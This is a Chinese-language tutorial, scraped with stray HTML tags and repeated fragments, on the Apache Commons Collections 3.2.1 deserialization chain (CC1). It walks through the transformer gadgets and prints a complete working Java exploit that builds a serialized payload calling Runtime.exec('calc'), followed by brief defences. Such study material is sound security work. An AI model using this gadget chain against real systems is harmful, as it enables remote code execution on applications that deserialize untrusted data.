Apache Commons Collections反序列化漏洞(CC1)深入分析<\/h1>

1. CC1漏洞概述<\/h2>
Apache Commons Collections是一个扩展了Java标准集合框架的库，提供了更多功能。CC1漏洞是Java反序列化漏洞中的经典案例，利用Apache Commons Collections库中的特定功能链实现远程代码执行。<\/p>

2. 环境配置要求<\/h2>

JDK版本<\/strong>：推荐使用JDK 1.8或8版本<\/li>
OpenJDK<\/strong>：建议安装以便查看.class文件的反编译代码<\/li>

依赖库<\/strong>：commons-collections 3.2.1版本<\/li> <\/ul>
3. 核心概念与组件<\/h2>
3.1 关键类与接口<\/h3>

InvokerTransformer<\/strong>：<\/p>

核心功能：通过反射调用任意方法<\/li>
示例代码：
new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>}).<\/span>transform<\/span>(<\/span>runtime);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> TransformedMap<\/strong>：<\/p> 提供对Map的装饰功能，可以在修改Map时触发转换操作<\/li> 关键方法：decorate()<\/code>用于创建装饰后的Map<\/li> <\/ul> <\/li> ChainedTransformer<\/strong>：<\/p> 实现多个Transformer的链式调用<\/li> 示例： Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{...};<\/span> <\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> ConstantTransformer<\/strong>：<\/p> 总是返回固定值的Transformer<\/li> 用于在链中提供初始对象<\/li> <\/ul> <\/li> <\/ol> 3.2 漏洞利用链<\/h3> 反射调用链<\/strong>：<\/p> Class c =<\/span> Runtime.<\/span>class<\/span>;<\/span> <\/span><\/span>Method m =<\/span> c.<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>,<\/span>null<\/span>);<\/span> <\/span><\/span>Runtime runtime =<\/span> (<\/span>Runtime)<\/span> m.<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>runtime.<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> 等效的InvokerTransformer实现<\/strong>：<\/p> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}).<\/span>transform<\/span>(<\/span>Runtime.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 漏洞利用详细步骤<\/h2> 4.1 构建Transformer链<\/h3> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span><\/code><\/pre>4.2 创建TransformedMap<\/h3> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "222"<\/span>);<\/span> \/\/ 必须使用"value"作为key <\/span><\/span><\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> decorate1 =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span> <\/span><\/span><\/code><\/pre>4.3 利用AnnotationInvocationHandler<\/h3> Class c=<\/span>Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span>Constructor constructor1 =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>Object o1 =<\/span> constructor1.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decorate1);<\/span> <\/span><\/span><\/code><\/pre>4.4 序列化与反序列化<\/h3> \/\/ 序列化 <\/span><\/span><\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span> <\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 反序列化 <\/span><\/span><\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"ser.bin"<\/span>));<\/span> <\/span><\/span>Object obj =<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span><\/code><\/pre>5. 关键点解析<\/h2> 为什么使用Target注解<\/strong>：<\/p> Target注解有一个value方法，与Map中的key对应<\/li> 必须使用"value"作为key才能通过检查<\/li> <\/ul> <\/li> checkSetValue的利用<\/strong>：<\/p> checkSetValue<\/code>方法会调用valueTransformer.transform(value)<\/code><\/li> 通过TransformedMap将valueTransformer设置为我们的恶意Transformer链<\/li> <\/ul> <\/li> Runtime类的序列化问题<\/strong>：<\/p> Runtime类不可序列化，因此需要通过反射链动态获取Runtime实例<\/li> 使用ConstantTransformer(Runtime.class)<\/code>提供起点<\/li> <\/ul> <\/li> <\/ol> 6. 完整利用代码<\/h2> package<\/span> org.example;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.Transformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span> <\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> java.io.*;<\/span> <\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Cc1test<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "222"<\/span>);<\/span> <\/span><\/span> Map<<\/span>Object,<\/span>Object><\/span> decorate1 =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span> Class c=<\/span>Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor constructor1 =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Object o1 =<\/span> constructor1.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decorate1);<\/span> <\/span><\/span> <\/span><\/span> serialize(<\/span>o1);<\/span> <\/span><\/span> unserialize(<\/span>"ser.bin"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> Object unserialize<\/span>(<\/span>String Filename)<\/span> throws<\/span> IOException,<\/span>ClassNotFoundException {<\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>Filename));<\/span> <\/span><\/span> Object obj =<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> return<\/span> obj;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>7. 防御措施<\/h2> 升级Apache Commons Collections到安全版本(3.2.2及以上)<\/li> 使用Java反序列化过滤器<\/li> 避免反序列化不可信数据<\/li> <\/ol> 8. 学习资源<\/h2> 视频教程: Java反序列化CommonsCollections篇(一) CC1链手写EXP<\/a><\/li> OpenJDK源码: https:\/\/hg.openjdk.org\/jdk8u\/jdk8u\/jdk\/archive\/af660750b2f4.zip<\/a><\/li> Maven仓库: commons-collections » commons-collections » 3.2.1<\/a><\/li> <\/ul>

Apache Commons Collections反序列化漏洞(CC1)深入分析<\/h1>

1. CC1漏洞概述<\/h2> Apache Commons Collections是一个扩展了Java标准集合框架的库，提供了更多功能。CC1漏洞是Java反序列化漏洞中的经典案例，利用Apache Commons Collections库中的特定功能链实现远程代码执行。<\/p>

3. 核心概念与组件<\/h2>

4. 漏洞利用详细步骤<\/h2>

8. 学习资源<\/h2> 视频教程: Java反序列化CommonsCollections篇(一) CC1链手写EXP<\/a><\/li> OpenJDK源码: https:\/\/hg.openjdk.org\/jdk8u\/jdk8u\/jdk\/archive\/af660750b2f4.zip<\/a><\/li> Maven仓库: commons-collections » commons-collections » 3.2.1<\/a><\/li> <\/ul>

1. CC1漏洞概述<\/h2>
Apache Commons Collections是一个扩展了Java标准集合框架的库，提供了更多功能。CC1漏洞是Java反序列化漏洞中的经典案例，利用Apache Commons Collections库中的特定功能链实现远程代码执行。<\/p>

8. 学习资源<\/h2>

视频教程: Java反序列化CommonsCollections篇(一) CC1链手写EXP<\/a><\/li>
OpenJDK源码: https:\/\/hg.openjdk.org\/jdk8u\/jdk8u\/jdk\/archive\/af660750b2f4.zip<\/a><\/li>
Maven仓库: commons-collections » commons-collections » 3.2.1<\/a><\/li> <\/ul>